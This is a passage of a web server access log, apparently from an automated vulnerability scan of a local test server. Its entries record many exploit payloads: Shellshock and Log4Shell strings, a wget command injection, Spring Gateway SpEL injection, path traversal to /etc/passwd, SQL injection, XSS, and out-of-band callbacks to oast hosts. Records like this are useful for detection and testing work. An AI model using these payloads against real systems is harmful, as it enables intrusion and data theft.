+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.560","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kustomization.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?qtproxycall=http://c9v8hs0smpv8c6ag07h058srmkzscsmus.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://c9v8hn0smpv8c57g0t00utejnedxqk7af.oast.live","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boafrm/formSysCmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"username=${jndi:ldap://${hostName}.c9v8hs0smpv8c6ag07h0mxx4a3ramymxr.oast.online/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dwr/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=/\x5C/evil.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"username=admin&password=ixcache","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652459794\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652459794\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"Password=297MbFJfT9MgczCTtE34i99JfYm&ConfirmPassword=297MbFJfT9MgczCTtE34i99JfYm&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/297MbBs81UHJag1eoUaOxguXRpQ/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22c9v8hn0smpv8c57g0t00bibrcqcftnexe.oast.live\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/297MbBs81UHJag1eoUaOxguXRpQ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/297MbBs81UHJag1eoUaOxguXRpQ], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x22297MbBs81UHJag1eoUaOxguXRpQ\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22c9v8hn0smpv8c57g0t00qzs5mfytbkeqg.oast.live\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /actuator/gateway/routes/297MbBs81UHJag1eoUaOxguXRpQ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /check_mk/login.py 